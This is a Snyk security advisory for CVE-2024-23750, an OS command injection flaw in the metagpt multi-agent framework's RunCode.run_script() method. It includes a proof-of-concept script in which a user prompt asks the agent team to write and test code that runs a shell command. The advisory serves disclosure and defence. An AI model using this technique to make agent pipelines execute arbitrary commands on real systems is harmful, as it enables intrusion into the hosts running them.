OS Command Injection Affecting metagpt package, versions [0,]
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.05% (24th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-METAGPT-6184700
- published 30 Jan 2024
- disclosed 22 Jan 2024
- credit fubuki8087
Introduced: 22 Jan 2024
CVE-2024-23750 Open this link in a new tabHow to fix?
There is no fixed version for metagpt.
Overview
metagpt is a The Multi-Agent Framework
Affected versions of this package are vulnerable to OS Command Injection via the RunCode.run_script() method. An attacker with the QaEngineer role can execute arbitrary commands on the system by injecting shell metacharacters into the input parameters.
PoC
import os
os.environ["OPENAI_API_KEY"] = "sk-..."
import asyncio
from metagpt.roles import (
ProductManager,
Architect,
ProjectManager,
Engineer,
QaEngineer
)
from metagpt.team import Team
async def startup(idea: str):
company = Team()
company.hire(
[
ProductManager(),
Architect(),
ProjectManager(),
Engineer(),
QaEngineer()
]
)
company.invest(investment=1.0)
company.run_project(idea=idea)
await company.run(n_round=16)
async def app(user_prompt):
await startup(idea=user_prompt)
if __name__ == "__main__":
user_input = "I want to execute shell command `ls -l`. Please help me write a piece of code and test this code."
asyncio.run(app(user_input))
References
CVSS Scores
version 3.1